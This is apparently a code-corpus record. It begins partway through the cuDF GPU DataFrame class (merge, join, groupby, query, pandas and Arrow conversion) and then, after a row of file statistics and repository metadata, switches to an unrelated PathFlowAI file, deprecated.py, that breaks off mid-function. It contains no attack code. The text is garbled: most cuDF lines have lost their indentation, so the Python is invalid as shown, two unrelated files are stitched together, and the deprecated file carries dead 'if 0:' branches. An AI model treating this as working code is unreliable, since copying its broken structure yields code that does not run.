order=order)
for colidx, inpcol in enumerate(cols):
dense = inpcol.to_gpu_array(fillna='pandas')
matrix[:, colidx].copy_to_device(dense)
elif order == 'C':
matrix = cudautils.row_matrix(cols, nrow, ncol, dtype)
else:
            errmsg = ("order parameter should be 'C' for row major or 'F' for "
                      "column major GPU matrix")
            raise ValueError(errmsg)
return matrix
def as_matrix(self, columns=None):
"""Convert to a matrix in host memory.
Parameters
----------
columns : sequence of str
List of a column names to be extracted. The order is preserved.
If None is specified, all columns are used.
Returns
-------
A (nrow x ncol) numpy ndarray in "F" order.
"""
return self.as_gpu_matrix(columns=columns).copy_to_host()
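    # Usage sketch (column names are assumptions): handy for handing data to
    # GPU libraries that expect a dense matrix.
    #   df = DataFrame([('a', [1.0, 2.0]), ('b', [3.0, 4.0])])
    #   gpu_mat = df.as_gpu_matrix(['a', 'b'])   # 2x2 device array, 'F' order
    #   host_mat = df.as_matrix(['a', 'b'])      # same values as a numpy array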
def one_hot_encoding(self, column, prefix, cats, prefix_sep='_',
dtype='float64'):
"""
Expand a column with one-hot-encoding.
Parameters
----------
column : str
the source column with binary encoding for the data.
prefix : str
the new column name prefix.
cats : sequence of ints
the sequence of categories as integers.
prefix_sep : str
the separator between the prefix and the category.
dtype :
the dtype for the outputs; defaults to float64.
Returns
-------
a new dataframe with new columns append for each category.
Examples
--------
.. code-block:: python
import pandas as pd
from cudf.dataframe import DataFrame as gdf
pet_owner = [1, 2, 3, 4, 5]
pet_type = ['fish', 'dog', 'fish', 'bird', 'fish']
df = pd.DataFrame({'pet_owner': pet_owner, 'pet_type': pet_type})
df.pet_type = df.pet_type.astype('category')
# Create a column with numerically encoded category values
df['pet_codes'] = df.pet_type.cat.codes
my_gdf = gdf.from_pandas(df)
# Create the list of category codes to use in the encoding
codes = my_gdf.pet_codes.unique()
enc_gdf = my_gdf.one_hot_encoding('pet_codes', 'pet_dummy', codes)
enc_gdf.head()
Output:
.. code-block:: python
pet_owner pet_type pet_codes pet_dummy_0 pet_dummy_1 pet_dummy_2
0 1 fish 2 0.0 0.0 1.0
1 2 dog 1 0.0 1.0 0.0
2 3 fish 2 0.0 0.0 1.0
3 4 bird 0 1.0 0.0 0.0
4 5 fish 2 0.0 0.0 1.0
"""
newnames = [prefix_sep.join([prefix, str(cat)]) for cat in cats]
newcols = self[column].one_hot_encoding(cats=cats, dtype=dtype)
outdf = self.copy()
for name, col in zip(newnames, newcols):
outdf.add_column(name, col)
return outdf
def label_encoding(self, column, prefix, cats, prefix_sep='_', dtype=None,
na_sentinel=-1):
"""Encode labels in a column with label encoding.
Parameters
----------
column : str
the source column with binary encoding for the data.
prefix : str
the new column name prefix.
cats : sequence of ints
the sequence of categories as integers.
prefix_sep : str
the separator between the prefix and the category.
dtype :
the dtype for the outputs; see Series.label_encoding
na_sentinel : number
Value to indicate missing category.
Returns
-------
a new dataframe with a new column append for the coded values.
"""
newname = prefix_sep.join([prefix, 'labels'])
newcol = self[column].label_encoding(cats=cats, dtype=dtype,
na_sentinel=na_sentinel)
outdf = self.copy()
outdf.add_column(newname, newcol)
return outdf
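    # Minimal sketch, reusing the 'pet_codes' column built in the
    # one_hot_encoding() example above (names are assumptions):
    #   codes = my_gdf.pet_codes.unique()
    #   enc_gdf = my_gdf.label_encoding('pet_codes', 'pet', codes)
    #   # adds a 'pet_labels' column holding the encoded category codes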
def _sort_by(self, sorted_indices):
df = DataFrame()
# Perform out = data[index] for all columns
for k in self.columns:
df[k] = self[k].take(sorted_indices.to_gpu_array())
return df
def sort_index(self, ascending=True):
"""Sort by the index
"""
return self._sort_by(self.index.argsort(ascending=ascending))
def sort_values(self, by, ascending=True):
"""
Uses parallel radixsort, which is a stable sort.
Parameters
----------
by : str
Name of Series to sort by
ascending : bool, default True
Sort ascending vs. descending.
Returns
-------
sorted_obj : cuDF DataFrame
Difference from pandas:
* *by* must be the name of a single column.
        * Support axis='index' only.
* Not supporting: inplace, kind, na_position
Examples
--------
.. code-block:: python
from cudf.dataframe import DataFrame
a = ('a', [0, 1, 2])
b = ('b', [-3, 2, 0])
df = DataFrame([a, b])
df.sort_values('b')
Output:
.. code-block:: python
a b
0 0 -3
2 2 0
1 1 2
"""
# argsort the `by` column
return self._sort_by(self[by].argsort(ascending=ascending))
def nlargest(self, n, columns, keep='first'):
"""Get the rows of the DataFrame sorted by the n largest value of *columns*
Difference from pandas:
* Only a single column is supported in *columns*
"""
return self._n_largest_or_smallest('nlargest', n, columns, keep)
def nsmallest(self, n, columns, keep='first'):
"""Get the rows of the DataFrame sorted by the n smallest value of *columns*
Difference from pandas:
* Only a single column is supported in *columns*
"""
return self._n_largest_or_smallest('nsmallest', n, columns, keep)
def _n_largest_or_smallest(self, method, n, columns, keep):
# Get column to operate on
if not isinstance(columns, str):
[column] = columns
else:
column = columns
if not (0 <= n < len(self)):
            raise ValueError("n is out of bounds")
col = self[column].reset_index()
# Operate
sorted_series = getattr(col, method)(n=n, keep=keep)
df = DataFrame()
new_positions = sorted_series.index.gpu_values
for k in self.columns:
if k == column:
df[k] = sorted_series
else:
df[k] = self[k].reset_index().take(new_positions)
return df.set_index(self.index.take(new_positions))
def merge(self, other, on=None, how='left', lsuffix='_x', rsuffix='_y',
type="", method='hash'):
"""Merge GPU DataFrame objects by performing a database-style join operation
by columns or indexes.
Parameters
----------
other : DataFrame
on : label or list; defaults to None
Column or index level names to join on. These must be found in
both DataFrames.
If on is None and not merging on indexes then
this defaults to the intersection of the columns
in both DataFrames.
how : str, defaults to 'left'
Only accepts 'left'
left: use only keys from left frame, similar to
a SQL left outer join; preserve key order
lsuffix : str, defaults to '_x'
Suffix applied to overlapping column names on the left side
rsuffix : str, defaults to '_y'
Suffix applied to overlapping column names on the right side
type : str, defaults to 'hash'
Returns
-------
merged : DataFrame
Examples
--------
.. code-block:: python
from cudf.dataframe import DataFrame
df_a = DataFrame()
            df_a['key'] = [0, 1, 2, 3, 4]
            df_a['vals_a'] = [float(i + 10) for i in range(5)]
df_b = DataFrame()
df_b['key'] = [1, 2, 4]
df_b['vals_b'] = [float(i+10) for i in range(3)]
df_merged = df_a.merge(df_b, on=['key'], how='left')
print(df_merged.sort_values('key'))
Output:
.. code-block:: python
             key  vals_a  vals_b
3 0 10.0
0 1 11.0 10.0
1 2 12.0 11.0
4 3 13.0
2 4 14.0 12.0
"""
_gdf.nvtx_range_push("PYGDF_JOIN", "blue")
if type != "":
warnings.warn(
                'type="' + type + '" parameter is deprecated. '
                'Use method="' + type + '" instead.',
DeprecationWarning
)
method = type
if how not in ['left', 'inner', 'outer']:
raise NotImplementedError('{!r} merge not supported yet'
.format(how))
same_names = set(self.columns) & set(other.columns)
if same_names and not (lsuffix or rsuffix):
raise ValueError('there are overlapping columns but '
'lsuffix and rsuffix are not defined')
def fix_name(name, suffix):
if name in same_names:
return "{}{}".format(name, suffix)
return name
lhs = self
rhs = other
col_cats = {}
for name in on:
if pd.api.types.is_categorical_dtype(self[name]):
lcats = self[name].cat.categories
rcats = other[name].cat.categories
if how == 'left':
cats = lcats
other[name] = (other[name].cat.set_categories(cats)
.fillna(-1))
elif how == 'right':
cats = rcats
self[name] = (self[name].cat.set_categories(cats)
.fillna(-1))
elif how in ['inner', 'outer']:
# Do the join using the union of categories from both side.
# Adjust for inner joins afterwards
cats = sorted(set(lcats) | set(rcats))
self[name] = (self[name].cat.set_categories(cats)
.fillna(-1))
self[name] = self[name]._column.as_numerical
other[name] = (other[name].cat.set_categories(cats)
.fillna(-1))
other[name] = other[name]._column.as_numerical
col_cats[name] = cats
for name, col in lhs._cols.items():
if pd.api.types.is_categorical_dtype(col) and name not in on:
f_n = fix_name(name, lsuffix)
col_cats[f_n] = self[name].cat.categories
for name, col in rhs._cols.items():
if pd.api.types.is_categorical_dtype(col) and name not in on:
f_n = fix_name(name, rsuffix)
col_cats[f_n] = other[name].cat.categories
cols, valids = cpp_join.join(lhs._cols, rhs._cols, on, how,
method=method)
df = DataFrame()
# Columns are returned in order left - on - right from libgdf
# Creating dataframe with ordering as pandas:
gap = len(self.columns) - len(on)
for idx in range(len(on)):
if (cols[idx + gap].dtype == 'datetime64[ms]'):
df[on[idx]] = DatetimeColumn(data=Buffer(cols[idx + gap]),
dtype=np.dtype('datetime64[ms]'),
mask=Buffer(valids[idx]))
elif on[idx] in col_cats.keys():
df[on[idx]] = CategoricalColumn(data=Buffer(cols[idx + gap]),
categories=col_cats[on[idx]],
ordered=False,
mask=Buffer(valids[idx]))
else:
df[on[idx]] = NumericalColumn(data=Buffer(cols[idx + gap]),
dtype=cols[idx + gap].dtype,
mask=Buffer(valids[idx]))
idx = 0
for name in self.columns:
if name not in on:
f_n = fix_name(name, lsuffix)
if (cols[idx].dtype == 'datetime64[ms]'):
df[f_n] = DatetimeColumn(data=Buffer(cols[idx]),
dtype=np.dtype('datetime64[ms]'),
mask=Buffer(valids[idx]))
elif f_n in col_cats.keys():
df[f_n] = CategoricalColumn(data=Buffer(cols[idx]),
categories=col_cats[f_n],
ordered=False,
mask=Buffer(valids[idx]))
else:
df[f_n] = NumericalColumn(data=Buffer(cols[idx]),
dtype=cols[idx].dtype,
mask=Buffer(valids[idx]))
idx = idx + 1
idx = len(self.columns)
for name in other.columns:
if name not in on:
f_n = fix_name(name, rsuffix)
if (cols[idx].dtype == 'datetime64[ms]'):
df[f_n] = DatetimeColumn(data=Buffer(cols[idx]),
dtype=np.dtype('datetime64[ms]'),
mask=Buffer(valids[idx]))
elif f_n in col_cats.keys():
df[f_n] = CategoricalColumn(data=Buffer(cols[idx]),
categories=col_cats[f_n],
ordered=False,
mask=Buffer(valids[idx]))
else:
df[f_n] = NumericalColumn(data=Buffer(cols[idx]),
dtype=cols[idx].dtype,
mask=Buffer(valids[idx]))
idx = idx + 1
_gdf.nvtx_range_pop()
return df
def join(self, other, on=None, how='left', lsuffix='', rsuffix='',
sort=False, type="", method='hash'):
"""Join columns with other DataFrame on index or on a key column.
Parameters
----------
other : DataFrame
how : str
Only accepts "left", "right", "inner", "outer"
lsuffix, rsuffix : str
The suffices to add to the left (*lsuffix*) and right (*rsuffix*)
column names when avoiding conflicts.
sort : bool
Set to True to ensure sorted ordering.
Returns
-------
joined : DataFrame
Notes
-----
Difference from pandas:
- *other* must be a single DataFrame for now.
- *on* is not supported yet due to lack of multi-index support.
"""
_gdf.nvtx_range_push("PYGDF_JOIN", "blue")
# Outer joins still use the old implementation
if type != "":
warnings.warn(
                'type="' + type + '" parameter is deprecated. '
                'Use method="' + type + '" instead.',
DeprecationWarning
)
method = type
if how not in ['left', 'right', 'inner', 'outer']:
raise NotImplementedError('unsupported {!r} join'.format(how))
if how == 'right':
# libgdf doesn't support right join directly, we will swap the
# dfs and use left join
            return other.join(self, how='left', lsuffix=rsuffix,
                              rsuffix=lsuffix, sort=sort, method=method)
same_names = set(self.columns) & set(other.columns)
if same_names and not (lsuffix or rsuffix):
raise ValueError('there are overlapping columns but '
'lsuffix and rsuffix are not defined')
lhs = DataFrame()
rhs = DataFrame()
# Creating unique column name to use libgdf join
idx_col_name = str(random.randint(2**29, 2**31))
while idx_col_name in self.columns or idx_col_name in other.columns:
idx_col_name = str(random.randint(2**29, 2**31))
lhs[idx_col_name] = Series(self.index.as_column()).set_index(self
.index)
rhs[idx_col_name] = Series(other.index.as_column()).set_index(other
.index)
for name in self.columns:
lhs[name] = self[name]
for name in other.columns:
rhs[name] = other[name]
lhs = lhs.reset_index()
rhs = rhs.reset_index()
cat_join = False
if pd.api.types.is_categorical_dtype(lhs[idx_col_name]):
cat_join = True
lcats = lhs[idx_col_name].cat.categories
rcats = rhs[idx_col_name].cat.categories
if how == 'left':
cats = lcats
rhs[idx_col_name] = (rhs[idx_col_name].cat
.set_categories(cats)
.fillna(-1))
elif how == 'right':
cats = rcats
lhs[idx_col_name] = (lhs[idx_col_name].cat
.set_categories(cats)
.fillna(-1))
elif how in ['inner', 'outer']:
cats = sorted(set(lcats) | set(rcats))
lhs[idx_col_name] = (lhs[idx_col_name].cat
.set_categories(cats)
.fillna(-1))
lhs[idx_col_name] = lhs[idx_col_name]._column.as_numerical
rhs[idx_col_name] = (rhs[idx_col_name].cat
.set_categories(cats)
.fillna(-1))
rhs[idx_col_name] = rhs[idx_col_name]._column.as_numerical
if lsuffix == '':
lsuffix = 'l'
if rsuffix == '':
rsuffix = 'r'
df = lhs.merge(rhs, on=[idx_col_name], how=how, lsuffix=lsuffix,
rsuffix=rsuffix, method=method)
if cat_join:
df[idx_col_name] = CategoricalColumn(data=df[idx_col_name].data,
categories=cats,
ordered=False)
df = df.set_index(idx_col_name)
if sort and len(df):
return df.sort_index()
return df
def groupby(self, by, sort=False, as_index=False, method="sort"):
"""Groupby
Parameters
----------
by : list-of-str or str
Column name(s) to form that groups by.
sort : bool
Force sorting group keys.
Depends on the underlying algorithm.
as_index : bool; defaults to False
Must be False. Provided to be API compatible with pandas.
The keys are always left as regular columns in the result.
method : str, optional
A string indicating the method to use to perform the group by.
Valid values are "sort", "hash", or "cudf".
"cudf" method may be deprecated in the future, but is currently
the only method supporting group UDFs via the `apply` function.
Returns
-------
The groupby object
Notes
-----
Unlike pandas, this groupby operation behaves like a SQL groupby.
No empty rows are returned. (For categorical keys, pandas returns
rows for all categories even if they are no corresponding values.)
Only a minimal number of operations is implemented so far.
- Only *by* argument is supported.
- Since we don't support multiindex, the *by* columns are stored
as regular columns.
"""
if (method == "cudf"):
from cudf.groupby.legacy_groupby import Groupby
if as_index:
msg = "as_index==True not supported due to the lack of\
multi-index"
raise NotImplementedError(msg)
result = Groupby(self, by=by)
return result
else:
from cudf.groupby.groupby import Groupby
_gdf.nvtx_range_push("PYGDF_GROUPBY", "purple")
if as_index:
msg = "as_index==True not supported due to the lack of\
multi-index"
raise NotImplementedError(msg)
# The matching `pop` for this range is inside LibGdfGroupby
# __apply_agg
result = Groupby(self, by=by, method=method)
return result
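    # Usage sketch (column names and the .mean() aggregation are assumptions):
    #   df = DataFrame([('key', [0, 0, 1]), ('val', [1.0, 2.0, 3.0])])
    #   grouped = df.groupby(['key'], method='hash')
    #   means = grouped.mean()   # one row per distinct 'key'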
def query(self, expr):
"""
Query with a boolean expression using Numba to compile a GPU kernel.
See pandas.DataFrame.query.
Parameters
----------
expr : str
A boolean expression. Names in expression refer to columns.
Names starting with `@` refer to Python variables
Returns
-------
filtered : DataFrame
Examples
--------
.. code-block:: python
from cudf.dataframe import DataFrame
a = ('a', [1, 2, 2])
b = ('b', [3, 4, 5])
df = DataFrame([a, b])
expr = "(a == 2 and b == 4) or (b == 3)"
df.query(expr)
Output:
.. code-block:: python
a b
0 1 3
1 2 4
DateTime conditionals:
.. code-block:: python
from cudf.dataframe import DataFrame
            import numpy as np
            import datetime as dt
df = DataFrame()
data = np.array(['2018-10-07', '2018-10-08'], dtype='datetime64')
df['datetimes'] = data
search_date = dt.datetime.strptime('2018-10-08', '%Y-%m-%d')
df.query('datetimes==@search_date')
Output:
.. code-block:: python
datetimes
1 2018-10-08T00:00:00.000
"""
_gdf.nvtx_range_push("PYGDF_QUERY", "purple")
# Get calling environment
callframe = inspect.currentframe().f_back
callenv = {
'locals': callframe.f_locals,
'globals': callframe.f_globals,
}
# Run query
boolmask = queryutils.query_execute(self, expr, callenv)
selected = Series(boolmask)
newdf = DataFrame()
for col in self.columns:
newseries = self[col][selected]
newdf[col] = newseries
result = newdf
_gdf.nvtx_range_pop()
return result
@applyutils.doc_apply()
def apply_rows(self, func, incols, outcols, kwargs, cache_key=None):
"""
Apply a row-wise user defined function.
Parameters
----------
{params}
Examples
--------
The user function should loop over the columns and set the output for
each row. Loop execution order is arbitrary, so each iteration of
the loop **MUST** be independent of each other.
When ``func`` is invoked, the array args corresponding to the
input/output are strided so as to improve GPU parallelism.
The loop in the function resembles serial code, but executes
concurrently in multiple threads.
.. code-block:: python
import cudf
import numpy as np
df = cudf.dataframe.DataFrame()
nelem = 3
df['in1'] = np.arange(nelem)
df['in2'] = np.arange(nelem)
df['in3'] = np.arange(nelem)
# Define input columns for the kernel
in1 = df['in1']
in2 = df['in2']
in3 = df['in3']
def kernel(in1, in2, in3, out1, out2, kwarg1, kwarg2):
for i, (x, y, z) in enumerate(zip(in1, in2, in3)):
out1[i] = kwarg2 * x - kwarg1 * y
out2[i] = y - kwarg1 * z
Call ``.apply_rows`` with the name of the input columns, the name and
dtype of the output columns, and, optionally, a dict of extra
arguments.
.. code-block:: python
df.apply_rows(kernel,
incols=['in1', 'in2', 'in3'],
outcols=dict(out1=np.float64, out2=np.float64),
kwargs=dict(kwarg1=3, kwarg2=4))
Output:
.. code-block:: python
in1 in2 in3 out1 out2
0 0 0 0 0.0 0.0
1 1 1 1 1.0 -2.0
2 2 2 2 2.0 -4.0
"""
return applyutils.apply_rows(self, func, incols, outcols, kwargs,
cache_key=cache_key)
@applyutils.doc_applychunks()
def apply_chunks(self, func, incols, outcols, kwargs={}, chunks=None,
tpb=1):
"""
Transform user-specified chunks using the user-provided function.
Parameters
----------
{params}
{params_chunks}
Examples
--------
For ``tpb > 1``, ``func`` is executed by ``tpb`` number of threads
concurrently. To access the thread id and count,
use ``numba.cuda.threadIdx.x`` and ``numba.cuda.blockDim.x``,
respectively (See `numba CUDA kernel documentation`_).
.. _numba CUDA kernel documentation:\
http://numba.pydata.org/numba-doc/latest/cuda/kernels.html
In the example below, the *kernel* is invoked concurrently on each
specified chunk. The *kernel* computes the corresponding output
for the chunk.
By looping over the range
``range(cuda.threadIdx.x, in1.size, cuda.blockDim.x)``, the *kernel*
function can be used with any *tpb* in a efficient manner.
.. code-block:: python
from numba import cuda
def kernel(in1, in2, in3, out1):
for i in range(cuda.threadIdx.x, in1.size, cuda.blockDim.x):
x = in1[i]
y = in2[i]
z = in3[i]
out1[i] = x * y + z
See also
--------
.apply_rows
"""
if chunks is None:
raise ValueError('*chunks* must be defined')
return applyutils.apply_chunks(self, func, incols, outcols, kwargs,
chunks=chunks, tpb=tpb)
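    # A possible invocation of the kernel sketched in the docstring above; the
    # chunk size and tpb values are arbitrary assumptions:
    #   df.apply_chunks(kernel,
    #                   incols=['in1', 'in2', 'in3'],
    #                   outcols=dict(out1=np.float64),
    #                   chunks=16,
    #                   tpb=8)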
def hash_columns(self, columns=None):
"""Hash the given *columns* and return a new Series
Parameters
----------
column : sequence of str; optional
Sequence of column names. If columns is *None* (unspecified),
all columns in the frame are used.
"""
from . import numerical
if columns is None:
columns = self.columns
cols = [self[k]._column for k in columns]
return Series(numerical.column_hash_values(*cols))
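    # Example sketch (assumed columns): df.hash_columns(['key1', 'key2'])
    # returns one integer hash per row; partition_by_hash() below builds on
    # the same idea.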
def partition_by_hash(self, columns, nparts):
"""Partition the dataframe by the hashed value of data in *columns*.
Parameters
----------
columns : sequence of str
The names of the columns to be hashed.
Must have at least one name.
nparts : int
Number of output partitions
Returns
-------
partitioned: list of DataFrame
"""
cols = [col._column for col in self._cols.values()]
names = list(self._cols.keys())
key_indices = [names.index(k) for k in columns]
# Allocate output buffers
outputs = [col.copy() for col in cols]
# Call hash_partition
offsets = _gdf.hash_partition(cols, key_indices, nparts, outputs)
# Re-construct output partitions
outdf = DataFrame()
for k, col in zip(self._cols, outputs):
outdf[k] = col
# Slice into partition
return [outdf[s:e] for s, e in zip(offsets, offsets[1:] + [None])]
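    # Minimal sketch, assuming a 'key' column:
    #   parts = df.partition_by_hash(['key'], nparts=4)
    #   assert sum(len(p) for p in parts) == len(df)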
def to_pandas(self):
"""
Convert to a Pandas DataFrame.
Examples
--------
.. code-block:: python
from cudf.dataframe import DataFrame
a = ('a', [0, 1, 2])
b = ('b', [-3, 2, 0])
df = DataFrame([a, b])
pdf = df.to_pandas()
type(pdf)
Output:
.. code-block:: python
<class 'pandas.core.frame.DataFrame'>
"""
index = self.index.to_pandas()
data = {c: x.to_pandas(index=index) for c, x in self._cols.items()}
return pd.DataFrame(data, columns=list(self._cols), index=index)
@classmethod
def from_pandas(cls, dataframe, nan_as_null=True):
"""
Convert from a Pandas DataFrame.
Raises
------
TypeError for invalid input type.
Examples
--------
.. code-block:: python
import cudf
import pandas as pd
data = [[0,1], [1,2], [3,4]]
pdf = pd.DataFrame(data, columns=['a', 'b'], dtype=int)
cudf.dataframe.DataFrame.from_pandas(pdf)
Output:
.. code-block:: python
<cudf.DataFrame ncols=2 nrows=3 >
"""
if not isinstance(dataframe, pd.DataFrame):
raise TypeError('not a pandas.DataFrame')
df = cls()
# Set columns
for colk in dataframe.columns:
df[colk] = Series(dataframe[colk].values, nan_as_null=nan_as_null)
# Set index
return df.set_index(dataframe.index.values)
def to_arrow(self, index=True):
"""
Convert to a PyArrow Table.
Examples
--------
.. code-block:: python
from cudf.dataframe import DataFrame
a = ('a', [0, 1, 2])
b = ('b', [-3, 2, 0])
df = DataFrame([a, b])
df.to_arrow()
Output:
.. code-block:: python
pyarrow.Table
None: int64
a: int64
b: int64
"""
arrays = []
names = []
if index:
names.append(self.index.name)
arrays.append(self.index.to_arrow())
for name, column in self._cols.items():
names.append(name)
arrays.append(column.to_arrow())
return pa.Table.from_arrays(arrays, names=names)
@classmethod
def from_arrow(cls, table):
"""Convert from a PyArrow Table.
Raises
------
TypeError for invalid input type.
**Notes**
Does not support automatically setting index column(s) similar to how
``to_pandas`` works for PyArrow Tables.
Examples
--------
.. code-block:: python
import pyarrow as pa
from cudf.dataframe import DataFrame
            data = [pa.array([1, 2, 3]), pa.array([4, 5, 6])]
batch = pa.RecordBatch.from_arrays(data, ['f0', 'f1'])
table = pa.Table.from_batches([batch])
DataFrame.from_arrow(table)
Output:
.. code-block:: python
<cudf.DataFrame ncols=2 nrows=3 >
"""
if not isinstance(table, pa.Table):
raise TypeError('not a pyarrow.Table')
df = cls()
for col in table.columns:
if len(col.data.chunks) != 1:
raise NotImplementedError("Importing from PyArrow Tables "
"with multiple chunks is not yet "
"supported")
df[col.name] = col.data.chunk(0)
return df
def to_records(self, index=True):
"""Convert to a numpy recarray
Parameters
----------
index : bool
Whether to include the index in the output.
Returns
-------
numpy recarray
"""
members = [('index', self.index.dtype)] if index else []
members += [(col, self[col].dtype) for col in self.columns]
dtype = np.dtype(members)
ret = np.recarray(len(self), dtype=dtype)
if index:
ret['index'] = self.index.values
for col in self.columns:
ret[col] = self[col].to_array()
return ret
@classmethod
def from_records(self, data, index=None, columns=None, nan_as_null=False):
"""Convert from a numpy recarray or structured array.
Parameters
----------
data : numpy structured dtype or recarray
index : str
The name of the index column in *data*.
If None, the default index is used.
columns : list of str
List of column names to include.
Returns
-------
DataFrame
"""
names = data.dtype.names if columns is None else columns
df = DataFrame()
for k in names:
# FIXME: unnecessary copy
df[k] = Series(np.ascontiguousarray(data[k]),
nan_as_null=nan_as_null)
if index is not None:
indices = data[index]
return df.set_index(indices.astype(np.int64))
return df
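    # Round-trip sketch with a hypothetical structured array:
    #   rec = np.rec.fromarrays([np.arange(3), np.ones(3)], names=['a', 'b'])
    #   df = DataFrame.from_records(rec)
    #   rec2 = df.to_records(index=True)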
def quantile(self, q, interpolation='linear', exact=False):
"""
Return values at the given quantile.
Parameters
----------
q : float or array-like
0 <= q <= 1, the quantile(s) to compute
interpolation : {`linear`, `lower`, `higher`, `midpoint`, `nearest`}
This parameter specifies the interpolation method to use,
when the desired quantile lies between two data points i and j.
Default 'linear'.
columns : list of str
List of column names to include.
exact : boolean
Whether to use approximate or exact quantile algorithm.
Returns
-------
DataFrame
"""
result = DataFrame()
result['Quantile'] = q
for k, col in self._cols.items():
result[k] = col.quantile(q, interpolation, exact,
quant_index=False)
        return result
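    # Usage sketch: df.quantile([0.25, 0.5, 0.75]) returns a DataFrame with a
    # 'Quantile' column plus one column of cut points per numeric input column.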
class Loc(object):
"""
For selection by label.
"""
def __init__(self, df):
self._df = df
def __getitem__(self, arg):
if isinstance(arg, tuple):
row_slice, col_slice = arg
elif isinstance(arg, slice):
row_slice = arg
col_slice = self._df.columns
else:
raise TypeError(type(arg))
df = DataFrame()
begin, end = self._df.index.find_label_range(row_slice.start,
row_slice.stop)
for col in col_slice:
sr = self._df[col]
df.add_column(col, sr[begin:end], forceindex=True)
return df
register_distributed_serializer(DataFrame)
| 31.655354 | 84 | 0.511488 |
7531acf352e8987d94ac5c56b1c380105d4df383 | 10,302 | py | Python | deprecated_work/deprecated.py | sumanthratna/PathFlowAI | 70324e78da7ad9452789478b9be7cc76515ea3ab | [
"MIT"
] | null | null | null | deprecated_work/deprecated.py | sumanthratna/PathFlowAI | 70324e78da7ad9452789478b9be7cc76515ea3ab | [
"MIT"
] | null | null | null | deprecated_work/deprecated.py | sumanthratna/PathFlowAI | 70324e78da7ad9452789478b9be7cc76515ea3ab | [
"MIT"
] | null | null | null | def extract_patch_info(
basename,
input_dir="./",
annotations=[],
threshold=0.5,
patch_size=224,
generate_finetune_segmentation=False,
target_class=0,
intensity_threshold=100.0,
target_threshold=0.0,
):
# from collections import OrderedDict
# annotations=OrderedDict(annotations)
# from dask.multiprocessing import get
# import time
from dask import dataframe as dd
import dask.delayed
import multiprocessing
from shapely.ops import unary_union
from shapely.geometry import MultiPolygon
from itertools import product
from os.path import join
import numpy as np
from pathflowai.utils import (
load_dataset,
npy2da,
create_purple_mask,
is_coords_in_box,
is_valid_patch,
)
import pandas as pd
arr, masks = load_dataset(
join(input_dir, "{}.zarr".format(basename)),
join(input_dir, "{}_mask.pkl".format(basename)),
)
if "annotations" in masks:
segmentation = True
if generate_finetune_segmentation:
segmentation_mask = npy2da(join(input_dir, "{}_mask.npy".format(basename)))
else:
segmentation = False
# masks=np.load(masks['annotations'])
# npy_file = join(input_dir,'{}.npy'.format(basename))
purple_mask = create_purple_mask(arr)
x_max = float(arr.shape[0])
y_max = float(arr.shape[1])
x_steps = int((x_max - patch_size) / patch_size)
y_steps = int((y_max - patch_size) / patch_size)
for annotation in annotations:
try:
masks[annotation] = (
[unary_union(masks[annotation])] if masks[annotation] else []
)
except:
masks[annotation] = (
[MultiPolygon(masks[annotation])] if masks[annotation] else []
)
# @pysnooper.snoop("process_line.log")
def return_line_info(row):
xs = row["x"]
ys = row["y"]
xf = xs + patch_size
yf = ys + patch_size
print(basename, xs, ys)
# if is_valid_patch((purple_mask[xs:xf,ys:yf]>=intensity_threshold).compute(), threshold):#.compute()
# print(xs,ys, 'valid_patch')
if segmentation:
row["annotation"] = "segment"
# info=[basename,xs,ys,patch_size,'segment']
seg = segmentation_mask[xs:xf, ys:yf].compute()
# info=info+
row.iloc[-target_class:] = [(seg == i).mean() for i in range(target_class)]
# if generate_finetune_segmentation:
else:
row.iloc[-len(annotations) :] = [
is_coords_in_box(
coords=np.array([xs, ys]),
patch_size=patch_size,
boxes=masks[annotation],
)
for annotation in annotations
]
row["annotation"] = annotations[
row.iloc[-len(annotations) :].argmax()
] # [np.argmax(annotation_areas)]
# info=[basename,xs,ys,patch_size,main_annotation]+annotation_areas
# else:
# if segmentation:
# info = [basename, xs, ys, patch_size, 'NA'] + \
# [0. for i in range(target_class)]
# else:
# info = [basename, xs, ys, patch_size, 'NA'] + \
# [0. for i in range(len(annotations))]
return row # info
def seg_line(xs, ys, patch_size, segmentation_mask, target_class):
xf = xs + patch_size
yf = ys + patch_size
seg = segmentation_mask[xs:xf, ys:yf]
return [(seg == i).mean() for i in range(target_class)]
def annot_line(xs, ys, patch_size, masks, annotations):
return [
is_coords_in_box(
coords=np.array([xs, ys]),
patch_size=patch_size,
boxes=masks[annotation],
)
for annotation in annotations
]
patch_info = pd.DataFrame(
[
(
[basename, i * patch_size, j * patch_size, patch_size, "NA"]
+ [0.0] * (target_class if segmentation else len(annotations))
)
for i, j in product(range(x_steps + 1), range(y_steps + 1))
],
columns=(
["ID", "x", "y", "patch_size", "annotation"]
+ (
annotations
if not segmentation
else list([str(i) for i in range(target_class)])
)
),
) # [dask.delayed(return_line_info)(i,j) for (i,j) in product(range(x_steps+1),range(y_steps+1))]
valid_patches = []
for xs, ys in patch_info[["x", "y"]].values.tolist():
valid_patches.append(
dask.delayed(is_valid_patch)(
xs, ys, patch_size, purple_mask, intensity_threshold, threshold
)
)
patch_info = patch_info.loc[np.array(dask.compute(valid_patches))]
area_info = []
if segmentation:
patch_info.loc[:, "annotation"] = "segment"
for xs, ys in patch_info[["x", "y"]].values.tolist():
area_info.append(
dask.delayed(seg_line)(
xs, ys, patch_size, segmentation_mask, target_class
)
)
else:
for xs, ys in patch_info[["x", "y"]].values.tolist():
area_info.append(
[
dask.delayed(is_coords_in_box)(
xs, ys, patch_size, masks, annotation
)
for annotation in annotations
]
)
patch_info.iloc[:, 6:] = np.array(dask.compute(area_info))
annot = list(patch_info.iloc[:, 6:])
patch_info.loc[:, "annotation"] = np.vectorize(
lambda i: annot[patch_info.iloc[i, 6:].argmax()]
)(
np.arange(patch_info.shape[0])
) # patch_info[np.arange(target_class).astype(str).tolist()].values.argmax(1).astype(str)
if 0:
patch_info = dd.from_pandas(
patch_info, npartitions=2 * multiprocessing.cpu_count()
)
meta_info = [
("ID", str),
("x", int),
("y", int),
("patch_size", int),
("annotation", str),
] + (
[(annotation, np.float) for annotation in annotations]
if not segmentation
else list([(str(i), np.float) for i in range(target_class)])
)
# patch_info = dd.from_delayed(patch_info,meta=meta_info).compute()
patch_info = patch_info.map_partitions(
lambda df: df.apply(return_line_info, axis=1), meta=meta_info
).compute(
scheduler="processes"
) # .values
# patch_info=patch_info.apply(return_line_info,axis=1)
patch_info = patch_info.loc[patch_info["annotation"] != "NA"]
if segmentation:
a = 1
if 0:
patch_info = dd.from_pandas(
patch_info, npartitions=2 * multiprocessing.cpu_count()
)
meta_info = [
("ID", str),
("x", int),
("y", int),
("patch_size", int),
("annotation", str),
] + (
[(annotation, np.float) for annotation in annotations]
if not segmentation
else list([(str(i), np.float) for i in range(target_class)])
)
